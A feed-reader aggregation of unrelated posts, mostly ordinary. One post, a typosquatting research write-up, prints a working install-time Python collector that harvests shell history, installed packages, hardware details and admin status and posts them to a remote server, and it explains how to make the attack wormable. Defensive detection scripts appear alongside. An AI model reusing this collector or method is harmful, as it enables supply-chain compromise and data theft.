Perhaps better then to speak not of genes but the genome — all your genes together. And not the genome as a unitary actor, but the genome in conversation with itself, with other genomes, and with the outside environment. If grasshoppers becoming locusts, sweet bees becoming killers, and genetic assimilation are to be believed, it’s those conversations that define the organism and drive the evolution of new traits and species. It’s not a selfish gene or a solitary genome. It’s a social genome.

What would Mendel think of that? Let’s play this out.

Mendel actually studied bees as a boy, and he studied them again for a couple years after he finished his pea-plant studies. In crossbreeding two species at the monastery, he accidentally created a strain of bees so vicious that he couldn’t work with them. If he’d had an RNA sequencer, he, like Gene Robinson, could have studied how much of the bees’ aggression rose from changes in the genetic code or how much rose from gene expression in response to the environment. If he had, the father of genetics might have seen right then that traits change and species evolve not just when genes change, but when a creature and its genome and hive mates respond to an environment. He might have discovered not just genes, but genetic assimilation. Not the selfish gene, but the social genome.

Alas, no such equipment existed, and Mendel worked in a monastery in the middle of town. His vicious bees promised not a research opportunity but trouble. So he killed them. He would found genetics not through a complex story told by morphing bees, but through a simple tale told by one pea wrinkled and one pea smooth.

This is a revised version of the essay ‘Die, selfish gene, die’. It replaced the original on 13 December, 2013. Reader comments posted before that date were responding to the original version. A post at the author’s blog explains the revision and includes some other resources.


30 Jun 19:00

Fun ways to make coffee on Instagram

by Mexido de Ideias


There are many types of coffee, and many preparation methods too. But the ways of preparing the drink and the recipes that use the bean are endless, from the traditional to the most unusual. Into this second category falls Australian Zac Tucket, owner of the Instagram account Six Impossible Things.


Underwater, in a yoga pose, upside down, juggling… Not even the laws of gravity stop the former barista (and now podiatrist) from declaring his love for coffee and for photography. The name of the channel, Six Impossible Things ("seis coisas impossíveis" in Portuguese), was inspired by Lewis Carroll's book Through the Looking-Glass. “That could be a good name for a coffee shop,” the Australian joked in an interview with the site Sprudge.

He started posting the images on Instagram as a way to promote artisanal brewing methods, as well as to share his interest in coffee. “That led me to meet incredible people and have great opportunities, more than I would ever have imagined. These days my work is about having a good time, without taking myself too seriously.”


Tucket describes his creative process as something simple, without much planning. “In the shower, I might think: ‘Has anyone ever taken a shower with filter coffee?’ Watching my cat acting strangely, I think: ‘OK, but let’s see if you can make coffee, my boy.’ And then I can’t let go of the thought without having at least tried to carry it out.”

Curious to see more of the fascinating work of this coffee-loving Australian? Just follow Six Impossible Things by clicking here.

By: Marina Oliveira

Photos: @six_impossiblethings


27 Jun 18:47

Facebook is using your phone’s location to suggest new friends—which could be a privacy disaster

by Kashmir Hill

Erendira Mancias/FUSION

Facebook’s ability to discern with creepy accuracy the “people we may know” has surprised, delighted, and horrified its users for years. While the magic sauce behind friend suggestions has always been a bit mysterious, it now includes some potentially unsettling information. Thanks to tracking the location of users’ smartphones, the social network may suggest you friend people you’ve shared a GPS data point with, meaning your friend suggestions could include someone whose face you know, but whose name you didn’t until Facebook offered it up to you.

Last week, I met a man who suspected Facebook had tracked his location to figure out who he was meeting with. He was a dad who had recently attended a gathering for suicidal teens. The next morning, he told me, he opened Facebook to find that one of the anonymous parents at the gathering popped up as a “person you may know.”

The two parents hadn’t exchanged contact information (one way Facebook suggests friends is to look at your phone contacts). The only connection the two appeared to have was being in the same place at the same time, and thus their smartphones being in the same room. The man immediately checked the privacy settings on his phone and saw that Facebook “always” had access to his location. He immediately changed it to “never.” (He also did not want to reveal his identity for this story.)

It turns out his suspicions were correct.

“People You May Know are people on Facebook that you might know,” a Facebook spokesperson said. “We show you people based on mutual friends, work and education information, networks you’re part of, contacts you’ve imported and many other factors.”

One of those factors is smartphone location. A Facebook spokesperson said though that shared location alone would not result in a friend suggestion, saying that the two parents must have had something else in common, such as overlapping networks.

“Location information by itself doesn’t indicate that two people might be friends,” said the Facebook spokesperson. “That’s why location is only one of the factors we use to suggest people you may know.”

Facebook has gotten more aggressive in its use of smartphone location data in the last year, tracking which stores you go to in order to tell advertisers if their online ads worked and letting advertisers use your phone’s location to geotarget you with ads. But until now, most people didn’t realize that Facebook was also tracking their phone’s location to suggest friends to them.

The implications of this are far-reaching. There are situations in which this could be incredibly useful. It means you could finally become Facebook friends with “Karen” from yoga class. Or if you meet awesome new people at a party, but forget to exchange numbers, last names, or Snapchat handles, Facebook could make new friendships happen by surfacing those party-goers to you. Great! Those are best case scenarios.

But there are plenty of scenarios in which Facebook casually connecting you with people because your phones were in the same place at the same time could end disastrously. Imagine going to an Alcoholics Anonymous meeting, and then getting “Friend” suggestions the next day for members of the group along with their full names and profile information. Or getting hit on at the bar by a guy that gives you the creeps, giving him the cold shoulder and no information about yourself, but later getting a ‘Friend Request’ from him. Or visiting an abortion clinic and discovering that one of the abortion protestors outside was offered up your identity by Facebook.

Last year, Motherboard asked how Facebook was figuring out who people were going out on Tinder dates with. The report was ultimately inconclusive as experts said that data from Tinder doesn’t flow back to Facebook, but it may well have been location-based.

“Using location data this way is dangerous,” said Woodrow Hartzog, a law professor at Samford University, via email. “People need to keep their visits to places like doctor’s offices, rehab, and support centers discreet. Once Facebook users realize that the ‘People You May Know’ are the ‘People That Go To the Same Places You Do,’ this feature will inevitably start outing people’s intimate information without their knowledge.”

Most Facebook users who have the app on their phone with location access granted likely don’t realize this could happen. It’s not mentioned on Facebook’s help page about how “People You May Know” works.

“This is the kind of thing that people should be given explicit and multiple warnings about,” said Hartzog. “They should also be asked to affirmatively turn on the feature before their whereabouts are used to get them friends. Geolocation data is far more sensitive than most of the kinds of information people probably assume are used to suggest friends, such as alma mater and mutual friends.”

For now, if it’s troubling to you, the way you can prevent it is to turn off Facebook’s access to your location. It’s in your phone’s privacy settings.


The setting if you want to deprive Facebook of the ability to track your movements

* Updated to add additional comment from Facebook.

21 May 10:08

Byzantine - BigFly

"Byzantine"
A drone tour inside a Neo-Byzantine church.

One drone, one Neo-Byzantine church.
A solemn place that the sun lights up every day. Come and discover it.

Production BigFly

Festivals:
- Best Film, Architecture category - Drone Film & Photo festival (Belgium) - 2016
- 2nd Jury Prize - Drone Festival (Poland) - 2016
- Official Selection - Los Angeles CineFest (USA) - 2016
- Official Selection - Viva Film Festival (Bosnia and Herzegovina) - 2016
- Official Selection - London Drone Film Festival (England) - 2016
- Official Selection - Festival du Film Professionnel de Drone (Nantes) - 2016


Aerial Drone Imagery & Film Production
Cinema / Advertising / Documentary / Television

bigfly.fr

contact@bigfly.fr

facebook.com/bigfly.fr/

2016

Cast: BigFly.fr, Joris Favraud and Guillaume JUIN

Tags: drone, cinema, bigfly, aerial, cinematography, gryphon, église, church, interior, drone video, byzantine and byzantin

09 Jun 20:30

Watch This Fascinatingly Incoherent Short Film Written By a Neural Network

by James Whitbrook on io9, shared by Riley MacLeod to Kotaku

We’re getting A.I. to do all sorts of weird and wonderful things these days, whether it’s on the small scale of text prediction or captioning photos, to driving cars for us and beating people at board games. But what if we turned a neural network into a science fiction writer? The answer is that you’d get a complete mess in return.


13 Jun 09:00

Just returned from vacation; git pull

by sharhalakis

by paran0id

10 Jun 09:00

Waiting the late night deploy to finish

by sharhalakis

by @uaiHebert

08 Jun 20:11

Typosquatting programming language package managers

by Nikolai Tschacher

Edit: It seems that the blog post and the thesis caused quite some interest. Please contact me under the following mail address, since my mail server on this VPS is constantly down :/ tschachn [|[at]|] hu-berlin [[|dot|]] de


  • 17000 computers were forced to execute arbitrary code by typosquatting programming language packages/libraries
  • 50% of these installations were conducted with administrative rights
  • Even highly security aware institutions (.gov and .mil hosts) fell victim to this attack
  • a typosquatting attack becomes wormable by mining the command history data of hosts
  • some good defenses against typosquatting package managers might look like

The complete thesis can be downloaded as a PDF.

In the second part of 2015 and the early months of 2016, I worked on my bachelor's thesis. In this thesis, I tried to attack programming language package managers such as Python's PyPi, NodeJS's Npmjs.com and Ruby's rubygems.org. The attack does not exploit a new technical vulnerability; rather, it tries to trick people into installing packages that they did not intend to run on their systems.

DNS Typosquatting

In the domain name system, typosquatting is a well-known problem. Typosquatting is the malicious registering of a domain that is lexically similar to another, often highly frequented, website. Typosquatters would for instance register a domain named Gooogle.com instead of the well-known Google.com. Then they hope that people mistype the website name in the browser and accidentally arrive on the wrong site. The misguided traffic is then often monetized either with advertisements or malicious attacks such as drive-by downloads or exploit kits.

The Idea

While writing the thesis, I wondered whether the concept behind DNS typosquatting can be transferred to other use cases. Having used the programming language Python for several years, I learned that the third-party package manager pip (a command line application) is used to install software libraries from Python’s community repository named PyPi. So the natural question is: How many users commit typos when issuing an installation command in the terminal by using pip?

sudo pip install reqeusts

Because everybody can upload any package on PyPi, it is possible to create packages which are typo versions of popular packages that are prone to be mistyped. And if somebody unintentionally installs such a package, the next question comes intuitively: Is it possible to run arbitrary code and take over the computer during the installation process of a package?

The Attack

So basically we create a fake package that has a similar name to a famous package on PyPi, Npmjs.com or rubygems.org. For example we could upload a package named reqeusts instead of the famous requests module. I created such typo package names in three different ways:

  1. Creative typo names like coffe-script instead of coffee-script. Often only humans can create creative typo names, because their creation requires an intuitive understanding of what grammatical mistake is easy to make with the original name.

  2. Stdlib typos or core package names like urllib2. Stdlib typos are package names that do exist in the core of the language but haven't been registered in the third-party package manager yet.

  3. Algorithmically determined typo names like req7est instead of request. Algorithmic typo candidates are suggestions from algorithms like the Levenshtein distance.

All in all, I created over 200 such packages and equipped them with a small program and uploaded them over the course of several months. The idea is to add some code to the packages that is executed with the installing user's rights whenever the package is downloaded.
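A defender can run the same three categories in reverse and check requested names before anything is installed. The following is an added example, not code from the thesis or the original post; the allowlist, the stdlib list and the sample requirements are constructed for illustration, and the distance used is optimal string alignment (Levenshtein plus adjacent swaps) so that transpositions such as reqeusts count as a single edit.

```python
"""Flag requested package names that look like typos of well-known ones."""
import re

# Constructed sample data, not real popularity statistics.
POPULAR = {"requests", "request", "coffee-script", "django", "numpy"}
# Standard-library module names that people try to install from the index.
STDLIB_NAMES = {"urllib2", "json", "subprocess"}


def normalize(name):
    """PEP 503 style: lowercase, runs of '-', '_' and '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a, b):
    """Edit distance with insert, delete, substitute and adjacent swap."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            best = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            # Adjacent transposition: "eu" <-> "ue" costs one edit.
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                best = min(best, prev2[j - 2] + 1)
            cur.append(best)
        prev2, prev = prev, cur
    return prev[-1]


def classify(requested, popular=POPULAR, stdlib=STDLIB_NAMES, max_dist=1):
    """Return (verdict, target): known, stdlib, typo or unknown."""
    name = normalize(requested)
    if name in popular:
        return ("known", name)
    if name in stdlib:
        # Anything published under a stdlib name is third-party code.
        return ("stdlib", name)
    best = None
    for target in sorted(popular):
        # Very short names are one edit away from too many other names.
        if len(target) < 4 or abs(len(target) - len(name)) > max_dist:
            continue
        dist = osa_distance(name, target)
        if dist <= max_dist and (best is None or dist < best[0]):
            best = (dist, target)
    return ("typo", best[1]) if best else ("unknown", None)


def audit_requirements(lines, **kwargs):
    """Check requirements.txt style lines; return the suspicious entries."""
    findings = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue  # blank line, comment, or a pip option such as -r
        name = re.split(r"[<>=!~;\[\s]", line, maxsplit=1)[0]
        verdict, target = classify(name, **kwargs)
        if verdict in ("typo", "stdlib"):
            findings.append((name, verdict, target))
    return findings


# Constructed input using the typo examples from this post.
SAMPLE_REQUIREMENTS = """\
requests==2.10.0
reqeusts            # transposed letters
coffe-script>=1.0
urllib2
req7est
Django
left_pad
""".splitlines()

if __name__ == "__main__":
    for name, verdict, target in audit_requirements(SAMPLE_REQUIREMENTS):
        print("%-14s %-7s -> %s" % (name, verdict, target))
```

Names reported as unknown are not cleared by this check; they only failed to match the allowlist and still need review by other means.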

The following points need to be considered when attacking a package manager. The first two items of the list need to be fulfilled in order for the package repository to be vulnerable to typosquatting attacks.

  1. The possibility of registering any package name and uploading code without supervision.
  2. The feasibility to achieve code execution upon package installation on the host system.
  3. Accessibility and presence of good documentation for uploading and distributing packages on the package repositories.
  4. Difficulty in quickly learning the target programming language.

The reader might now ask whether it is really that easy for a package being installed to execute its own code.

Code Execution for Installed Python Packages

In Python, each package that is publicly registered needs to have a setup.py file that contains package metadata such as names, description and fixtures belonging to the package. Whenever a user installs a package from the PyPi package repository, this setup.py is executed by a local Python interpreter. This means that it is possible to hide code in the setup.py file that runs with the installing user's rights.

Code Execution for Installed NodeJS Packages

NodeJS and its package manager, npm, provide various hooks on specific events to execute code. There is also a preinstall option that can be set in the package.json file, which provides options and metadata for a published NodeJS package. It is favorable to write this preinstall script in JavaScript as well and execute it with the node binary, because node is guaranteed to be installed on the target system when npm is used to install third-party packages.

Code Execution for Installed Ruby Packages

Achieving code execution with Ruby was slightly trickier. There is no official way (like in Node.js) or easy method (like in Python’s setup.py file) to execute code upon installing packages with the Ruby package manager named gem. However, code execution was achieved by creating an empty native Ruby extension and placing the notification code in a Ruby extension configuration file named extconf.rb, which is interpreted during the pseudo build process.
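The three install-time execution points described above (setup.py, the npm install hooks in package.json, and extconf.rb) can be listed for an unpacked package before it is installed. This is an added example, not code from the thesis; the watchlist of modules, the sample packages and the script name notify.js are constructed for illustration.

```python
"""List install-time code-execution points in unpacked packages."""
import ast
import json
import os
import tempfile

# Modules that package metadata rarely needs (watchlist chosen for this
# example); importing them from setup.py deserves a look before installing.
WATCHLIST = {"urllib", "urllib2", "socket", "subprocess", "ctypes", "platform"}
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def audit_setup_py(path):
    """Return the watchlisted top-level modules a setup.py imports."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        source = fh.read()
    try:
        tree = ast.parse(source)
    except SyntaxError:
        # For example Python 2 only syntax: cannot be analysed here.
        return ["<unparseable: review by hand>"]
    found = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            found.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            found.add(node.module.split(".")[0])
    return sorted(found & WATCHLIST)


def audit_package_json(path):
    """Return 'hook: command' for every npm install-time script."""
    try:
        with open(path, encoding="utf-8") as fh:
            manifest = json.load(fh)
    except ValueError:
        return ["<invalid JSON: review by hand>"]
    scripts = manifest.get("scripts") if isinstance(manifest, dict) else None
    if not isinstance(scripts, dict):
        return []
    return ["%s: %s" % (h, scripts[h]) for h in NPM_INSTALL_HOOKS if h in scripts]


def audit_tree(root):
    """Walk a directory of unpacked packages; return sorted findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for filename in sorted(filenames):
            full = os.path.join(dirpath, filename)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if filename == "setup.py":
                # setup.py of a source distribution runs during install.
                findings.append(("python", rel, audit_setup_py(full)))
            elif filename == "package.json":
                hooks = audit_package_json(full)
                if hooks:
                    findings.append(("npm", rel, hooks))
            elif filename == "extconf.rb":
                note = "runs at gem install if listed in spec.extensions"
                findings.append(("ruby", rel, [note]))
    return sorted(findings)


def build_sample(root):
    """Write constructed sample packages, one per ecosystem, under root."""
    files = {
        "pypkg/setup.py": "import os, platform\nimport urllib.request\n"
                          "from setuptools import setup\nsetup(name='example')\n",
        "nodepkg/package.json": json.dumps(
            {"name": "example",
             "scripts": {"preinstall": "node notify.js", "test": "mocha"}}),
        "cleanpkg/package.json": json.dumps(
            {"name": "clean", "scripts": {"test": "mocha"}}),
        "rubypkg/ext/example/extconf.rb": "require 'mkmf'\n"
                                          "create_makefile('example')\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)


def run_sample():
    """Build the sample tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        return audit_tree(root)


if __name__ == "__main__":
    for ecosystem, rel, details in run_sample():
        print(ecosystem, rel, details)
```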

The Notification Program

Now that we have achieved code execution upon installation, it is time to show the program that was executed when the user installed such a typo package. The Python script below collects some non-personal host information and sends it to a University virtual private server that was set up beforehand. An equivalent program was developed for Ruby and NodeJS. I called this program Notification Program, because it notifies me whenever a user committed a typo and installed one of my typo packages. The data collected contains the IP address, the operating system, the user rights and a timestamp of the installation.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Notification program used in the typo squatting
bachelor thesis for the python package index.

Created in autumn 2015.

Copyright by Nikolai Tschacher
"""

import os
import ctypes
import sys
import platform
import subprocess

debug = False

# we are using Python3
if sys.version_info[0] == 3:
  import urllib.request
  from urllib.parse import urlencode

  GET = urllib.request.urlopen

  def python3POST(url, data={}, headers=None):
    """
    Returns the response of the POST request as string or
    False if the resource could not be accessed.
    """
    data = urllib.parse.urlencode(data).encode()
    request = urllib.request.Request(url, data)
    try:
      reponse = urllib.request.urlopen(request, timeout=15)
      cs = reponse.headers.get_content_charset()
      if cs:
        return reponse.read().decode(cs)
      else:
        return reponse.read().decode('utf-8')
    except urllib.error.HTTPError as he:
      # try again if some 400 or 500 error was received
      return ''
    except Exception as e:
      # everything else fails
      return False
  POST = python3POST
# we are using Python2
else:
  import urllib2
  from urllib import urlencode
  GET = urllib2.urlopen
  def python2POST(url, data={}, headers=None):
    """
    See python3POST
    """
    req = urllib2.Request(url, urlencode(data))
    try:
      response = urllib2.urlopen(req, timeout=15)
      return response.read()
    except urllib2.HTTPError as he:
      return ''
    except Exception as e:
      return False
  POST = python2POST


try:
  from subprocess import DEVNULL # py3k
except ImportError:
  DEVNULL = open(os.devnull, 'wb')


def get_command_history():
  if os.name == 'nt':
    # handle windows
    # http://serverfault.com/questions/95404/
    #is-there-a-global-persistent-cmd-history
    # apparently, there is no history in windows :(
    return ''

  elif os.name == 'posix':
    # handle linux and mac
    cmd = 'cat {}/.bash_history | grep -E "pip[23]? install"'
    return os.popen(cmd.format(os.path.expanduser('~'))).read()


def get_hardware_info():
  if os.name == 'nt':
    # handle windows
    return platform.processor()

  elif os.name == 'posix':
    # handle linux and mac
    if sys.platform.startswith('linux'):
      try:
        hw_info = subprocess.check_output('lshw -short',
                   stderr=DEVNULL, shell=True)
      except:
        hw_info = ''

      if not hw_info:
        try:
          hw_info = subprocess.check_output('lspci',
                   stderr=DEVNULL, shell=True)
        except:
          hw_info = ''
        hw_info += '\n' +\
          os.popen('free -m').read().strip()

      return hw_info

    elif sys.platform == 'darwin':
      # According to https://developer.apple.com/library/
      # mac/documentation/Darwin/Reference/ManPages/
      # man8/system_profiler.8.html
      # no personal information is provided by detailLevel: mini
      return os.popen('system_profiler -detailLevel mini').read()


def get_all_installed_modules():
  # first try the default path
  pip_list = os.popen('pip list').read().strip()

  if pip_list:
    return pip_list
  else:
    if os.name == 'nt':
      paths = ('C:/Python27',
           'C:/Python34',
           'C:/Python26',
           'C:/Python33',
           'C:/Python35',
           'C:/Python',
           'C:/Python2',
           'C:/Python3')
      # try some paths that make sense to me
      for loc in paths:
        pip_location = os.path.join(loc, 'Scripts/pip.exe')
        if os.path.exists(pip_location):
          cmd = '{} list'.format(pip_location)
          try:
            pip_list = subprocess.check_output(cmd,
                   stderr=DEVNULL, shell=True)
          except:
            pip_list = ''
          if pip_list:
            return pip_list
  return ''


def notify_home(url, package_name, intended_package_name):
  host_os = platform.platform()
  try:
    admin_rights = bool(os.getuid() == 0)
  except AttributeError:
    try:
      ret = ctypes.windll.shell32.IsUserAnAdmin()
      admin_rights = bool(ret != 0)
    except:
      admin_rights = False

  if os.name != 'nt':
    try:
      pip_version = os.popen('pip --version').read()
    except:
      pip_version = ''
  else:
    pip_version = platform.python_version()

  url_data = {
    'p1': package_name,
    'p2': intended_package_name,
    'p3': 'pip',
    'p4': host_os,
    'p5': admin_rights,
    'p6': pip_version,
  }

  post_data = {
    'p7': get_command_history(),
    'p8': get_all_installed_modules(),
    'p9': get_hardware_info(),
  }

  url_data = urlencode(url_data)
  response = POST(url + url_data, post_data)

  if debug:
    print(response)

  print('')
  print("Warning!!! Maybe you made a typo in your installation\
   command or the module does only exist in the python stdlib?!")
  print("Did you want to install '{}'\
   instead of '{}'??!".format(intended_package_name, package_name))
  print('For more information, please\
   visit http://svs-repo.informatik.uni-hamburg.de/')


def main():
  if debug:
    notify_home('http://localhost:8000/app/?',
             'pmba_basic', 'pmba_basic')
  else:
    notify_home('http://svs-repo.informatik.uni-hamburg.de/app/?',
                     'pmba_basic', 'pmba_basic')

if __name__ == '__main__':
  main()

Results

In two empirical phases, exactly 45334 HTTP requests by 17289 unique hosts (distinct IP addresses) were gathered. This means that 17289 distinct hosts executed the program above and sent the data to the web server, where it was analyzed for the thesis. The number of HTTP requests is, for various reasons, higher than the number of distinct IP addresses. The main reason is that pip executes the setup.py file twice on installation. Don't ask me why.

Packages for three different package managers, PyPI (Python), rubygems.org (Ruby) and npmjs.com (Node.js – JavaScript), were uploaded and distributed. Most installations were received from PyPI, with 15221 unique installations measured by distinct IP addresses. Rubygems.org follows with 1631 distinct installations. Npmjs.com, with 525 total unique IP addresses counted, had the smallest number of installations.

At least 43.6% of the 17289 unique IP addresses executed the notification program with administrative rights. Of the 19603 distinct interactions, 8614 machines used Linux as an operating system, 6174 used Windows and 4758 computers were running OS X. Only 57 hosts (or 0.29%) could not be mapped to one of these three major operating systems. These were mostly FreeBSD and Java operating systems (or, in rare instances, junk data that was submitted manually and thus not possible to parse).

Some statistical numbers for the uploaded packages and their installations:

  • 214 total different uploaded typo packages on three different package repositories
  • 92 average installations per package
  • The standard deviation of installations per package is 433 and thus relatively high
  • The most installed package (urllib2) received 3929 unique installations in almost 2 weeks (284 average installations per day)
  • The most installed package per day was bs4 with 366 unique daily installations on average
  • The least installed package had only one installation (probably by a mirror or crawler)

The image below visualizes the installations over time. Each point shows the installations on a certain day. The upper plot shows the total number of unique installations on each single day. The light dashed line shows the installations with administrative rights. The bottom plot splits the installations into two sets: those of the top five installed packages (circles as markers) and those of all remaining packages (squares as markers). Light sub-graphs show the administrative ratio.

Downloads over time

In the image below, a reverse lookup was conducted on the gathered IP addresses. The number of hosts for some interesting domains are shown.

Downloads over time

Making the attack wormable

The basic idea is to make the typosquatting attack wormable by mining typo candidates from the command line history of encountered hosts. The function get_command_history() in the Notification Program above

def get_command_history():
  if os.name == 'nt':
    # handle windows
    # http://serverfault.com/questions/95404/
    #is-there-a-global-persistent-cmd-history
    # apparently, there is no history in windows :(
    return ''

  elif os.name == 'posix':
    # handle linux and mac
    cmd = 'cat {}/.bash_history | grep -E "pip[23]? install"'
    return os.popen(cmd.format(os.path.expanduser('~'))).read()

collects the command history involving a pip installation command. Then the package names in the commands were parsed and I looked for all real typos by comparing them to the list of all existing packages in the PyPI index. If the package name wasn't found there, we successfully mined a new typo name.

The analysis of 1454 distinct hosts that sent their command history reveals a concerning result: by mining the command history for typos, several new high-class typo candidates, which promise large numbers of installations, have been located. Especially the module names git (misspelled on 90 distinct hosts), scikit (89 unique misspellings) and bs4 (31 hits) seem to be mistyped frequently among independent users. By registering them, lots of typo installations and thus code execution seem to be guaranteed. And the more new installations, the more newly mined typo candidates. Worm-like behavior.

Command history mining

Defenses against typo squatting

In short, read the thesis. If you are too lazy, do the following:

Prevent Direct Code Execution on Installations: This one is easy. Make sure that the software that unpacks and installs a third-party package (pip or npm) does not allow the execution of code that originates from the package itself. Library code should be executed only when the user explicitly loads the package.

Generate a List of Potential Typo Candidates: Generate Levenshtein distance candidates for the N most downloaded packages of the repository and alert administrators when such a candidate is registered.
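A registration-time version of this check, as an added example that is not part of the thesis or of any repository's code: instead of enumerating every candidate up front, it measures the Levenshtein distance between a newly requested name and each popular package. The function names, the distance limits and the POPULAR list are assumptions.

```python
import re

def levenshtein(a, b):
    """Edit distance (insert, delete, substitute) using two rolling rows."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # delete ca
                           cur[j - 1] + 1,             # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]

def normalize(name):
    # Treat case and runs of "-", "_", "." as equivalent, as PEP 503 does for PyPI.
    return re.sub(r"[-_.]+", "-", name).lower()

def typo_targets(new_name, popular, max_distance=2):
    """Return [(popular_name, distance)] for packages the new name is close to."""
    candidate = normalize(new_name)
    hits = []
    for pkg in popular:
        target = normalize(pkg)
        # Short names collide by chance at distance 2, so tighten the limit for them.
        limit = 1 if len(target) < 6 else max_distance
        d = levenshtein(candidate, target)
        if 0 < d <= limit:  # d == 0 is the existing project itself
            hits.append((pkg, d))
    return sorted(hits, key=lambda h: (h[1], h[0]))

def review_registration(new_name, popular):
    """Decision a registry hook could take: hold for an administrator or accept."""
    hits = typo_targets(new_name, popular)
    return ("hold", hits) if hits else ("accept", [])

# Constructed stand-in for "the most downloaded N packages" of a repository.
POPULAR = ["requests", "numpy", "django", "scikit-learn", "beautifulsoup4", "six"]
```

Names such as scikit, which the post found in command histories, are not edit-distance neighbours of scikit-learn and pass this check, which is why it works best alongside the 404 log analysis described on this page.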

Analyze 404 Logfiles and Prevent Registration of Often Shadow-Installed Packages: Whenever a user makes a typo while installing a package and the package is not registered yet, a 404 logfile entry is created on the repository server (because the install HTTP request targets a non-existent resource). Parse these failed installations and prevent registration of all names that are shadow-installed more often than a reasonable threshold per month.
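One way to implement the 404 log analysis, as an added example rather than code from the thesis. It assumes the repository serves pip's index lookups under /simple/<name>/ and writes Apache-style combined access logs; the sample log lines are constructed, and distinct client IPs are counted so that one host retrying does not inflate the total.

```python
import re
from collections import defaultdict

LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[\d{2}/(?P<mon>\w{3})/(?P<year>\d{4}):[^\]]+\] '
    r'"GET /simple/(?P<name>[^/\s"]+)/? HTTP/[\d.]+" (?P<status>\d{3}) ')

def shadow_installs(log_lines):
    """Map (month, normalized name) -> set of client IPs that received a 404."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LINE.match(line)
        if m and m.group("status") == "404":
            # Same normalization the index applies to project names (PEP 503).
            name = re.sub(r"[-_.]+", "-", m.group("name")).lower()
            month = m.group("year") + "-" + m.group("mon")
            seen[(month, name)].add(m.group("ip"))
    return seen

def names_to_reserve(log_lines, threshold):
    """Names requested by more than `threshold` distinct hosts in any one month."""
    hits = {}
    for (month, name), ips in shadow_installs(log_lines).items():
        if len(ips) > threshold:
            hits[name] = max(hits.get(name, 0), len(ips))
    return dict(sorted(hits.items(), key=lambda kv: (-kv[1], kv[0])))

SAMPLE_LOG = [  # constructed log lines; addresses are documentation ranges
    '192.0.2.10 - - [03/Nov/2015:10:01:02 +0000] "GET /simple/urllib2/ HTTP/1.1" 404 0 "-" "pip/7.1.2"',
    '192.0.2.10 - - [03/Nov/2015:10:01:03 +0000] "GET /simple/urllib2/ HTTP/1.1" 404 0 "-" "pip/7.1.2"',
    '198.51.100.7 - - [04/Nov/2015:08:00:00 +0000] "GET /simple/urllib2/ HTTP/1.1" 404 0 "-" "pip/7.1.2"',
    '203.0.113.5 - - [09/Nov/2015:17:30:11 +0000] "GET /simple/Urllib2/ HTTP/1.1" 404 0 "-" "pip/7.1.2"',
    '203.0.113.5 - - [09/Nov/2015:17:31:40 +0000] "GET /simple/requests/ HTTP/1.1" 200 5120 "-" "pip/7.1.2"',
    '198.51.100.7 - - [12/Nov/2015:09:12:45 +0000] "GET /simple/bs4/ HTTP/1.1" 404 0 "-" "pip/7.1.2"',
    '192.0.2.44 - - [01/Dec/2015:11:05:09 +0000] "GET /simple/bs4/ HTTP/1.1" 404 0 "-" "pip/7.1.2"',
]
```

With a threshold of 2, only urllib2 is reserved here: three distinct hosts asked for it in one month, while bs4 was requested by a single host in each of two months.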

Conclusion

If I had had malicious intentions and had distributed malware instead of the notification program, which only sends information to a university web server, then these 17289 unique hosts would be under my control. At least 43.6 % of hosts with administrative rights would have given me 8552 computers with complete access to the whole operating system API.

The results of this thesis showed that creating a botnet by exploiting human typing errors is perfectly possible. However, it is not easy to say how far the cover of free university research shielded the empirical study from being interrupted by security researchers.

In the thesis itself, several powerful methods to defend against typo squatting attacks are discussed. Therefore they are not included in this blog post.

In the thesis, the well known programming languages Python, NodeJS and Ruby were attacked. All their package managers were found to be vulnerable to typosquatting attacks. It is of great importance to find out whether other programming languages (such as .NET or Go) suffer from the same problems.

08 May 21:25

Check Out This Incredible Bond-Inspired Credit Sequence For The Empire Strikes Back

by Andrew Liptak on io9, shared by Gergo Vas to Kotaku

The opening crawl that opens up every Star Wars film is one of cinema’s most iconic moments, and will never change, but what happens when you take the stylings of a James Bond film and give it a try? Magic.


27 Mar 13:49

Don’t Believe Winter’s Lies [Comic]

by Geeks are Sexy

24 Mar 18:00

Copyright Warnings [Comic]

by Geeks are Sexy

11 Apr 01:01

“Sysadmin grants sudo privileges to developer on production web server” - Andrea del Verrocchio and Leonardo da Vinci, 1425-1475, Oil on wood

(collaboration from Joseph)

10 Mar 10:00

Did you hear that they are gonna give us a raise? Whaaat?

by sharhalakis

by @uaiHebert

23 Feb 15:12

Spellrazor Is “A Haunted Videogame From 1981″

by Graham Smith

Spellrazor [official site] is a “creepy resurrection of a semi-mythical game considered lost back in 1981,” according to its Game Jolt page. It’s also a top-down shmup with 27 weapons, each one assigned to a different button on your keyboard, and a console where you can access the fictional story of the game’s own development. It’s also also free in its current alpha state and worth your time.


01 Mar 20:12

Back to the Future Prequel Trailer: 1.21 Gigawatts

02 Feb 12:34

1608 – On legalizing marijuana

by Carlos Ruas

2773

08 Jan 15:22

Frustrated Pirates Prophesise The Death Of Game Piracy

by Alec Meer

And on that bombshell

